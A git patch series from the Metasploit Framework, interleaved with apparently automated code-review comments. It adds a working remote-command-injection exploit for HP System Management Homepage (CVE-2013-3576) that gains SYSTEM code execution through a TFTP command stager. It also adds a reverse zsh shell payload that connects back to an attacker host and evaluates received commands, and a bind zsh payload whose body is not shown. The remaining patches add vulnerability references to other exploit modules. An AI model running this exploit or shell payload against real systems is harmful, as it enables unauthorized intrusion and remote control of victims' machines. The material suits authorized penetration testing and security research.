From 20621d17ded71088d78b75368c995c829b02ef9a Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Thu, 20 Jun 2013 03:08:42 -0500
Subject: [PATCH 01/20] Add CVE-2013-3576 - HP System Management Homepage exploit
---
.../exploits/windows/http/hp_sys_mgmt_exec.rb | 94 +++++++++++++++++++
1 file changed, 94 insertions(+)
create mode 100644 modules/exploits/windows/http/hp_sys_mgmt_exec.rb
diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb
new file mode 100644
index 0000000000..c67944b116
--- /dev/null
+++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb
@@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStagerTFTP + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection", + 'Description' => %q{ + This module exploits a vulnerability found in HP System Management Homepage. By + supplying a specially crafted HTTP request, it is possible to control the + 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), + which will be used in a exec() function. This results in arbitrary code execution + under the context of SYSTEM. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Markus Wulftange', + 'sinn3r' #Metasploit + ], + 'References' => + [ + ['CVE', '2013-3576'], + ['OSVDB', '94191'], + ['US-CERT-VU', '735364'] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 11 2013", + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(2381) + ], self.class) + end + + def peer + "#{rhost}:#{rport}" + end + + def check + sig = Rex::Text.rand_text_alpha(10) + cmd = Rex::Text.uri_encode("echo #{sig}") + uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo" + + res = send_request_raw({'uri' => uri}) + if not res + print_error("#{peer} - Connection timed out") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Vulnerable if res.body =~ /#{sig}/ + Exploit::CheckCode::Safe + end + + def setup_stager + execute_cmdstager({ :temp => '.'}) + end + + def 
execute_command(cmd, opts={}) + # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil + uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo") + print_status("#{peer} - Executing: #{cmd}") + res = send_request_raw({'uri' => uri}) + end + + def exploit + @uri = normalize_uri('smhutil', 'snmpchp/') + "&&" + setup_stager + end +end \ No newline at end of file From ebde05b78322c5900d6cf0488a1be3e1e035c8e3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 03:18:33 -0500 Subject: [PATCH 02/20] Improve check --- modules/exploits/windows/http/hp_sys_mgmt_exec.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb index c67944b116..0268212207 100644 --- a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb @@ -72,7 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Vulnerable if res.body =~ /#{sig}/ + if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/ + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe end From 8dfe9b531895b1fad8d5c907d29f9fdf128fae4a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 04:16:23 -0500 Subject: [PATCH 03/20] Add login feature --- .../exploits/windows/http/hp_sys_mgmt_exec.rb | 89 ++++++++++++++++++- 1 file changed, 85 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb index 0268212207..aeae78a211 100644 --- a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb 
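Review bot: `execute_command` stores the response in `res` but never looks at it, so a stager request that gets no answer (`send_request_raw` returns nil, which the same file's `check` already treats as a timeout) or is rejected goes unnoticed and the operator only learns of it when no session arrives; drop the dead assignment and at least report the nil case, `print_error("#{peer} - No response from server") unless res`. `check` is an active probe rather than a version check — it runs an `echo` through the injection point and matches the marker in the body — which deserves a one-line comment above the method, e.g. `# Active check: runs an echo through the vulnerable parameter and looks for its output`. `res.body =~ /#{sig}/` builds a regex from the marker where `res.body.include?(sig)` is the plainer test.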
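Review bot: The new condition in `check` uses `and`, which binds more loosely than `=~` and only works here because the whole expression is a bare `if` condition; `&&` is the idiomatic form and keeps the expression safe to assign or combine later, and the marker lookup needs no regex: `if res.body =~ /SNMP data engine output/ && res.body.include?(sig)`. Requiring the banner alongside the echoed marker is a good tightening, since a page that reflects the request could otherwise return the marker and produce a false positive.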
@@ -21,7 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution - under the context of SYSTEM. + under the context of SYSTEM. Please note: In order for the exploit to work, the + victim must enable the 'tftp' command, which is the case by default for systems + such as Windows XP, 2003, etc. }, 'License' => MSF_LICENSE, 'Author' => @@ -51,22 +53,48 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => "Jun 11 2013", 'DefaultTarget' => 0)) + register_options( [ - Opt::RPORT(2381) + Opt::RPORT(2381), + # USERNAME/PASS may not be necessary, because the anonymous access is possible + OptString.new("USERNAME", [false, 'The username to authenticate as']), + OptString.new("PASSWORD", [false, 'The password to authenticate with']) ], self.class) end + def peer "#{rhost}:#{rport}" end + def check + cookie = '' + + if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? + cookie = login + if cookie.empty? + print_error("#{peer} - Login failed") + return Exploit::CheckCode::Safe + else + print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + end + end + sig = Rex::Text.rand_text_alpha(10) cmd = Rex::Text.uri_encode("echo #{sig}") uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo" - res = send_request_raw({'uri' => uri}) + req_opts = {} + req_opts['uri'] = uri + if not cookie.empty? + browser_chk = 'HPSMH-browser-check=done for this session' + curl_loc = "curlocation-#{datastore['USERNAME']}=" + req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}" + end + + res = send_request_raw(req_opts) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown 
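Review bot: In the new login branch of `check`, a failed login returns `Exploit::CheckCode::Safe`, but rejected credentials say nothing about whether the host is vulnerable; return `Exploit::CheckCode::Unknown` there so a typo in USERNAME/PASSWORD is not reported as "not vulnerable". The credential test `if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?` and the cookie-header assembly (`browser_chk`, `curl_loc`) are written out in full here and again in the following hunk's `execute_command` and `exploit`; a small `credentials_given?` predicate and a `build_cookie(session_cookie)` helper would keep the paths in step. `curlocation-#{datastore['USERNAME']}=` is placed straight into the Cookie header; the username is operator input, but a value containing `;` would split the header, so the helper is also the place to reject or encode it.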
@@ -79,18 +107,71 @@ class Metasploit3 < Msf::Exploit::Remote Exploit::CheckCode::Safe end + + def login + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + + cookie = '' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/proxy/ssllogin', + 'vars_post' => { + 'redirecturl' => '', + 'redirectquerystring' => '', + 'user' => username, + 'password' => password + } + }) + + if not res + fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login") + end + + # CpqElm-Login: success + if res.headers['CpqElm-Login'].to_s =~ /success/ + cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' + end + + cookie + end + + def setup_stager execute_cmdstager({ :temp => '.'}) end + def execute_command(cmd, opts={}) # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo") + + req_opts = {} + req_opts['uri'] = uri + if not @cookie.empty? + browser_chk = 'HPSMH-browser-check=done for this session' + curl_loc = "curlocation-#{datastore['USERNAME']}=" + req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}" + end + print_status("#{peer} - Executing: #{cmd}") - res = send_request_raw({'uri' => uri}) + res = send_request_raw(req_opts) end + def exploit + @cookie = '' + + if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? + @cookie = login + if @cookie.empty? + fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed") + else + print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + end + end + @uri = normalize_uri('smhutil', 'snmpchp/') + "&&" setup_stager end From 29bc1695078bac69f7c826166c4821b48e049bdf Mon Sep 17 00:00:00 2001 From: Steve Tornio Date: Thu, 20 Jun 2013 06:00:05 -0500 Subject: [PATCH 04/20] add osvdb ref 64171 --- modules/exploits/multi/http/jboss_bshdeployer.rb | 1 + 1 file changed, 1 insertion(+) 
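Review bot: In `login`, `res.headers['Set-Cookie'].scan(...)` runs whenever the `CpqElm-Login` header reports success, but nothing in the hunk guarantees a `Set-Cookie` header came with it, and `nil.scan` raises NoMethodError instead of the empty-cookie result both callers test for; `cookie = res.headers['Set-Cookie'].to_s.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''` keeps that contract. The timeout branch raises `Exploit::Failure::Unknown`, whereas `Exploit::Failure::Unreachable` is the code meant for a host that never answered. `execute_command` still assigns `res` without using it, and `exploit` repeats the login/`print_good` block from `check` verbatim, so a future fix to one path is easy to miss in the other.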
diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb
index f350fe4984..dc74bec520 100644
--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
+ [ 'OSVDB', '64171' ],
 [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
 [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
 ],
From 0dca5ede7ee43499e0155ba14c1c1bd416364c0f Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 06:07:08 -0500
Subject: [PATCH 05/20] add osvdb ref 78480
---
modules/exploits/multi/http/gitorious_graph.rb | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb
index 534eed47cc..33f883267d 100644
--- a/modules/exploits/multi/http/gitorious_graph.rb
+++ b/modules/exploits/multi/http/gitorious_graph.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ],
+ [ 'OSVDB', '78480'],
+ [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
 ],
 'Privileged' => false,
 'Payload' =>
From 42690a5c48a9200c54dacc7ef21828755b163647 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 06:38:47 -0500
Subject: [PATCH 06/20] add osvdb ref 77492
---
modules/exploits/multi/http/familycms_less_exec.rb | 1 +
1 file changed, 1 insertion(+)
diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb
index a38617c1b3..4018724b45 100644
--- a/modules/exploits/multi/http/familycms_less_exec.rb
+++ b/modules/exploits/multi/http/familycms_less_exec.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
+ [ 'OSVDB', '77492' ],
 [ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
 [ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
 [ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],
From ade970afb888e25725c0b96a0c724362b3593785 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 06:44:22 -0500
Subject: [PATCH 07/20] add osvdb ref 89322
---
modules/exploits/multi/http/movabletype_upgrade_exec.rb | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
index 0347f05503..f72f5da9d2 100644
--- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb
+++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
@@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote
 ],
 'References' =>
 [
- ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
- ['CVE', '2013-0209'],
- ['URL', 'http://www.sec-1.com/blog/?p=402'],
- ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
+ [ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate)
+ [ 'CVE', '2013-0209' ],
+ [ 'OSVDB', '89322' ],
+ [ 'URL', 'http://www.sec-1.com/blog/?p=402' ],
+ [ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ]
 ],
 'Arch' => ARCH_CMD,
 'Payload' =>
From ee21120c0486802fa55d84305ccb0daa9fa1ef9e Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 06:47:10 -0500
Subject: [PATCH 08/20] add osvdb ref 85509
---
modules/exploits/multi/http/mobilecartly_upload_exec.rb | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
index 1282412f56..fe0d7c80df 100644
--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
- ['EDB', '20422'],
- ['BID', '55399']
+ [ 'OSVDB', '85509' ],
+ [ 'EDB', '20422 '],
+ [ 'BID', '55399 ']
 ],
 'Payload' =>
 {
From 6cc7d9ccae78c6288e9dc215575eae770946ca65 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 06:54:06 -0500
Subject: [PATCH 09/20] add osvdb ref 85446 and edb ref 20500
---
modules/exploits/multi/http/testlink_upload_exec.rb | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb
index d91113a065..742e148378 100644
--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
- ['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
- #['OSVDB', ''],
- #['EDB', ''],
+ [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ],
+ [ 'OSVDB', '85446' ],
+ [ 'EDB', '20500' ]
 ],
 'Payload' =>
 {
From d19bd7a9052b76f679051b0e0abcbc6929ff670f Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 07:01:59 -0500
Subject: [PATCH 10/20] add osvdb 85739, cve 2012-5159, edb 21834
---
modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 8 +++++++-
1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
index 1ebb9d5a24..18e6cb50b9 100644
--- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
+++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
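Review bot: The rewritten EDB and BID references in the mobilecartly hunk carry a trailing space inside the identifier, `[ 'EDB', '20422 ']` and `[ 'BID', '55399 ']`, which the removed lines did not have; as far as I know the reference value is used verbatim when building the lookup link and matching against the reference databases, so the space yields a broken link and a missed match. They should read `[ 'EDB', '20422' ],` and `[ 'BID', '55399' ]`, with the space moved to before the closing bracket as in the OSVDB line above them.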
@@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'Author' => [ 'hdm' ],
 'License' => MSF_LICENSE,
- 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5159' ],
+ [ 'OSVDB', '85739' ],
+ [ 'EDB', '21834' ],
+ [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
+ ],
 'Privileged' => false,
 'Payload' =>
 {
From 2b55e0e0a6a9236ecef49bdd431a3cadaf21b3af Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 07:17:22 -0500
Subject: [PATCH 11/20] add osvdb ref 64171
---
modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 1 +
1 file changed, 1 insertion(+)
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
index ae8b61a428..598b9c95cf 100644
--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
+ [ 'OSVDB', '64171' ],
 [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
 [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
 ],
From 89f649ab991516ddfa0ced21eb060872d9d2a3de Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 07:28:29 -0500
Subject: [PATCH 12/20] add osvdb ref 89026
---
modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
index e5e5311505..9b7c122df4 100644
--- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
@@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- ['CVE', '2013-0156'],
- ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
+ [ 'CVE', '2013-0156' ],
+ [ 'OSVDB', '89026' ],
+ [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
 ],
 'Platform' => 'ruby',
 'Arch' => ARCH_RUBY,
From a824a0583e41ceddb51a342d796357730c5ff778 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 07:34:15 -0500
Subject: [PATCH 13/20] add osvdb ref 89059
---
modules/exploits/multi/browser/java_jre17_jmxbean.rb | 1 +
1 file changed, 1 insertion(+)
diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb
index 486c706b73..5b89c84049 100644
--- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb
+++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb
@@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2013-0422' ],
+ [ 'OSVDB', '89059' ],
 [ 'US-CERT-VU', '625617' ],
 [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
 [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
From cab20062a4b88f4b61c9edd2cd726aedda96caa9 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 07:38:34 -0500
Subject: [PATCH 14/20] add osvdb ref 84706
---
modules/exploits/osx/local/setuid_tunnelblick.rb | 1 +
1 file changed, 1 insertion(+)
diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb
index 691e167901..a07b825c3a 100644
--- a/modules/exploits/osx/local/setuid_tunnelblick.rb
+++ b/modules/exploits/osx/local/setuid_tunnelblick.rb
@@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local
 'References' =>
 [
 [ 'CVE', '2012-3485' ],
+ [ 'OSVDB', '84706' ],
 [ 'EDB', '20443' ],
 [ 'URL', 'http://blog.zx2c4.com/791' ]
 ],
From abea7e6a47f2e1530ec2cc2c97170b6696970621 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 07:55:50 -0500
Subject: [PATCH 15/20] add osvdb ref 76389
---
modules/exploits/osx/browser/safari_file_policy.rb | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb
index f4e149e274..a06c09311a 100644
--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
- ['CVE', '2011-3230'],
- ['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
- ['URL', 'http://support.apple.com/kb/HT5000']
+ [ 'CVE', '2011-3230' ],
+ [ 'OSVDB', '76389' ],
+ [ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ],
+ [ 'URL', 'http://support.apple.com/kb/HT5000' ]
 ],
 'Payload' =>
 {
From a3a5dec369ab4787b00b3d984d8cb665fd4a9ae2 Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 08:03:34 -0500
Subject: [PATCH 16/20] add osvdb ref 94441
---
modules/exploits/multi/http/freenas_exec_raw.rb | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb
index 94f76a22c1..a00d8ae78c 100644
--- a/modules/exploits/multi/http/freenas_exec_raw.rb
+++ b/modules/exploits/multi/http/freenas_exec_raw.rb
@@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ],
+ [ 'OSVDB', '94441' ],
+ [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
 ],
 'Payload' =>
 {
From 66f442420267ad320aac3d9117f8a38d201da62b Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 10:41:14 -0500
Subject: [PATCH 17/20] fix formatting
---
modules/exploits/multi/http/gitorious_graph.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb
index 33f883267d..93f2cb02c0 100644
--- a/modules/exploits/multi/http/gitorious_graph.rb
+++ b/modules/exploits/multi/http/gitorious_graph.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ 'OSVDB', '78480'],
+ [ 'OSVDB', '78480' ],
 [ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
 ],
 'Privileged' => false,
From 322ba27f0f071507ef738514a06d27401c7c31ed Mon Sep 17 00:00:00 2001
From: Steve Tornio
Date: Thu, 20 Jun 2013 11:17:23 -0500
Subject: [PATCH 18/20] re-order refs
---
modules/exploits/multi/http/testlink_upload_exec.rb | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb
index 742e148378..53d69b4627 100644
--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
- [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ],
 [ 'OSVDB', '85446' ],
- [ 'EDB', '20500' ]
+ [ 'EDB', '20500' ],
+ [ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ]
 ],
 'Payload' =>
 {
From 660c97f512cb92ac7a6e07faaa4e1564391a0152 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Thu, 20 Jun 2013 13:40:17 -0500
Subject: [PATCH 19/20] Add module for reverse zsh payload
For #1985
---
.../payloads/singles/cmd/unix/reverse_zsh.rb | 48 +++++++++++++++++++
1 file changed, 48 insertions(+)
create mode 100644 modules/payloads/singles/cmd/unix/reverse_zsh.rb
diff --git a/modules/payloads/singles/cmd/unix/reverse_zsh.rb b/modules/payloads/singles/cmd/unix/reverse_zsh.rb
new file mode 100644
index 0000000000..e4547ad6f8
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb
@@ -0,0 +1,48 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP (via Zsh)', + 'Description' => %q{ + Connect back and create a command shell via Zsh. Note: Although Zsh is often + available, please be aware it isn't usually installed by default. + }, + 'Author' => 'Doug Prostko ', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'zsh', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return super + command_string + end + + def command_string + cmd = "zmodload zsh/net/tcp;" + cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};" + cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;" + cmd << "ztcp -c" + cmd + end +end From 86fc101c1f77169fce1ba81e4324c3e1156bf52e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 20 Jun 2013 13:45:02 -0500 Subject: [PATCH 20/20] Add payload module bind zsh For #1984 --- modules/payloads/singles/cmd/unix/bind_zsh.rb | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 modules/payloads/singles/cmd/unix/bind_zsh.rb diff --git a/modules/payloads/singles/cmd/unix/bind_zsh.rb b/modules/payloads/singles/cmd/unix/bind_zsh.rb new file mode 100644 index 0000000000..6a2898120a --- /dev/null +++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb 
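Review bot: `generate` and `command_string` carry no comments in this new payload, while the sibling bind_zsh module added in the next commit of this series documents both (`# Constructs the payload` and `# Returns the command string to use for execution`); the same two header comments belong here so the pair read alike. `return super + command_string` can be the implicit `super + command_string` — an explicit `return` on a method's last expression is something `command_string` itself already avoids by ending on `cmd`. `'Payload' => { 'Offsets' => {}, 'Payload' => '' }` is written on one line here and spread across four lines in bind_zsh; either is fine, but the two files should pick one.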
